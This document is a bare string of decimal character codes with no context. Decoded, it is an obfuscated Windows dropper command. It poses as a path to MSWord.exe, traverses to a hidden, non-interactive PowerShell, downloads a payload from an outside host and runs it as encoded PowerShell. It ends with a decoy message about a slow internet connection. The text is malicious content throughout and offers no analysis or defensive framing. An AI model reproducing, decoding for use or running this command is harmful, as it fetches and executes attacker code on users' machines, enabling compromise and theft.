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67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35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97 32 115 108 111 119 32 105 110 116 101 114 110 101 116 32 99 111 110 110 101 99 116 105 111 110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116 114 121 32 97 103 97 105 110 32 108 97 116 101 114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